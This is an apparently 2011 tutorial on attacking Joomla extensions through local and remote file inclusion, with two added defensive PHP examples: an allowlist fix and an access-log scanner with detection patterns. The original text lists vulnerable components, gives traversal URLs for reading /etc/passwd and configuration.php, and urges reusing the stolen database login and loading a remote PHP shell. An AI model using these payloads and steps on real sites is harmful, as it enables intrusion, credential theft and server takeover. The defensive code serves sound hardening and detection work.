Joomla Remote File Inclusions RFI Attack

19/06/2011 23:09

Local file inclusions are great fun. You tell the site which file you want and it hands it over. Awesome! Display the configuration file that contains the database login? No problem.

Want to see the file /etc/passwd, since Joomla is hosted on a Linux machine? You can do that too.

Local file inclusions are a common problem in Joomla extensions. Many of them are vulnerable to this attack and some of them never get fixed. This can lead to the server being compromised, which is no fun at all - at least for the system administrator.

A typical URL vulnerable to LFI looks like this:

index.php?option=com_blablubb&item=2&view=guestbookpage

Generally, the parameters most often vulnerable are the following:

- controller

- view

- layout

- page

To give you an idea of what affected URLs look like, here are some examples I found earlier this year:

URL: index.php?option=com_jejob&view=some_value

Vulnerable parameter: view

URL: index.php?option=com_jeajaxeventcalendar&view=some_value

Vulnerable parameter: view

URL: index.php?option=com_jradio&controller=some_value

Vulnerable parameter: controller

(I found these myself.)

Now let's see how we can exploit one of these:

index.php?option=com_jradio&controller=../../../../etc/passwd

In this case we use the famous null byte, which helps us get around a limitation built into the component's PHP script.

In the example above, the controller parameter is used to include a file from the local disk. That file contains useful information for us.
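To show why the controller parameter is so often the weak spot, here is an added example (not code from this post or from any real Joomla component) modelling a component entry point that loads a controller named by ?controller=<name>. The vulnerable function builds the path the way the com_jradio case above implies; the hardened one only accepts names from a fixed allowlist. The component name com_example, the controllers directory, the allowlist entries and the function names are all assumptions made for the demo.

```php
<?php
// Added example, not code from the post or from any real Joomla component.
// It models a component entry point that loads a controller chosen by
// ?controller=<name>, as the com_jradio case in the post describes.
// Names (com_example, the controllers directory, the allowlist) are assumptions.

declare(strict_types=1);

// Vulnerable pattern: the raw request parameter is glued into a path and
// included.  "../" sequences walk out of the intended directory, and on
// PHP < 5.3.4 an embedded null byte cut the path off before the appended
// ".php" suffix, which is the "famous null byte" trick the post mentions.
function controllerPathVulnerable(string $dir, string $controller): string
{
    $path = $dir . '/' . $controller . '.php';
    // A real component would now do: require_once $path;
    return $path;   // returned instead so the effect can be inspected
}

// Hardened pattern: the parameter is only ever compared against a fixed
// allowlist; nothing derived from user input reaches the filesystem unless
// it is exactly one of these names.
const ALLOWED_CONTROLLERS = ['guestbook', 'item', 'search'];

function controllerPathSafe(string $dir, string $controller): ?string
{
    // Strict comparison: "guestbook\0" or "guestbook/../x" do not match.
    if (!in_array($controller, ALLOWED_CONTROLLERS, true)) {
        return null;   // unknown controller: refuse, log it, show a 404
    }
    // Belt and braces for when the allowlist is later made configurable:
    // a controller name is a single path segment of safe characters.
    if (preg_match('/\A[a-z0-9_]+\z/', $controller) !== 1) {
        return null;
    }
    return $dir . '/' . $controller . '.php';
}

// Demo on constructed inputs (the second and third are the kinds of values
// the post's examples carry in the controller parameter).
$dir = '/var/www/joomla/components/com_example/controllers';   // assumed path
$inputs = [
    'guestbook',
    '../../../../etc/passwd',
    "guestbook\0",
];
foreach ($inputs as $input) {
    printf("%-30s vulnerable -> %s\n", json_encode($input), controllerPathVulnerable($dir, $input));
    printf("%-30s safe       -> %s\n", '', controllerPathSafe($dir, $input) ?? 'REJECTED');
}
```

Run it with php from the command line. The vulnerable output for the traversal input shows the ".php" suffix still hanging off the end of the path, which is exactly the limitation the null byte was used against on old PHP versions; the hardened version does not depend on the PHP version at all, because the only strings that ever reach the filesystem are the three literals in the allowlist.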

If you are not familiar with local file inclusions, I suggest you read a tutorial on them, because I will not explain all the details here.

Now, knowing about a vulnerability in a Joomla component, we can try to access Joomla's configuration.php. This file contains interesting information.

Since many LFIs also reveal PHP source code, try the following:

index.php?option=com_blabla&view=../../../configuration.php

This displays the source of the file and gives you the credentials of the current database. Now look for a phpMyAdmin login on the same server and try to log in with that information.

You can now access all the Joomla tables and can basically do whatever you want.

Examples of Joomla remote file inclusions

Some Joomla components are also known to contain remote file inclusion vulnerabilities. RFI allows us to include files from another server and execute code on the target.

A typical RFI URL looks like an LFI URL. To give you a better sense of how to spot an RFI vulnerability within a few seconds, here are some telling examples:

URL: index.php?option=com_sef&Itemid=&mosConfig_absolute_path=

Vulnerable parameter: mosConfig_absolute_path

URL: index.php?option=com_jomestate&task=

Vulnerable parameter: task

Once you have found an RFI vulnerability, try to include a PHP shell hosted on another box. Once it has been loaded, you can browse all the Joomla files, download them, edit them, delete them ...

No Joomla installation is safe when there is an RFI exploit.
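From the administrator's side, the LFI and RFI requests shown throughout this post leave very recognisable traces in the web-server access log. As an added example (not part of the original post), here is a small PHP command-line script that flags such probes. The log lines, IP addresses (documentation ranges) and the remote URL in it are constructed for the demo; the indicator patterns are my assumptions about what these requests look like, derived from the URLs in this post.

```php
<?php
// Added example, not from the post: a small scanner that flags LFI/RFI probes
// of the kind the post describes in web-server access logs.  Log lines below
// are constructed for the demo (Apache "combined" format, documentation IPs).

declare(strict_types=1);

// Indicators, keyed by a label that appears in the report.
const INDICATORS = [
    'traversal'  => '~(?:\.\./|\.\.%2f|%2e%2e(?:/|%2f))~i',                 // ../ in any encoding
    'null_byte'  => '~%00~',                                                 // null-byte truncation
    'remote_url' => '~[?&][^=&]+=(?:https?|ftp)(?::|%3a)(?:/|%2f){2}~i',     // param=http://...
    'sensitive'  => '~(?:etc/passwd|configuration\.php|proc/self/environ)~i', // files named in the post
];

// Pulls client IP and request target out of one combined-format line.
function parseLine(string $line): ?array
{
    if (preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"/', $line, $m) !== 1) {
        return null;
    }
    return ['ip' => $m[1], 'target' => $m[2]];
}

// Returns the labels of every indicator the request target matches.
function matchIndicators(string $target): array
{
    $hits = [];
    foreach (INDICATORS as $label => $regex) {
        if (preg_match($regex, $target) === 1) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Scans all lines; returns only the suspicious ones with their indicators.
function scanLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $entry = parseLine($line);
        if ($entry === null) {
            continue;   // not a request line we understand
        }
        $hits = matchIndicators($entry['target']);
        if ($hits !== []) {
            $entry['indicators'] = $hits;
            $findings[] = $entry;
        }
    }
    return $findings;
}

// Constructed sample log: two of the post's LFI shapes, one RFI shape, one normal request.
$sampleLog = [
    '198.51.100.7 - - [19/Jun/2011:23:09:01 +0200] "GET /index.php?option=com_jradio&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Jun/2011:23:09:07 +0200] "GET /index.php?option=com_jomestate&task=http://203.0.113.9/x.txt? HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.14 - - [19/Jun/2011:23:10:15 +0200] "GET /index.php?option=com_content&view=article&id=2 HTTP/1.1" 200 7432 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Jun/2011:23:11:40 +0200] "GET /index.php?option=com_blabla&view=../../../configuration.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
];

foreach (scanLog($sampleLog) as $f) {
    printf("%-14s %-28s %s\n", $f['ip'], implode(',', $f['indicators']), $f['target']);
}
```

Three of the four constructed lines are reported (the com_content request is clean); in a real log the same client repeatedly hitting different components with these indicators, especially with 200 responses, is the pattern to alert on. The scanner only looks at the log: at the configuration level, inclusion of remote URLs through include() is refused when allow_url_include is Off in php.ini, which has been the default since PHP 5.2, so also check that setting on any Joomla host.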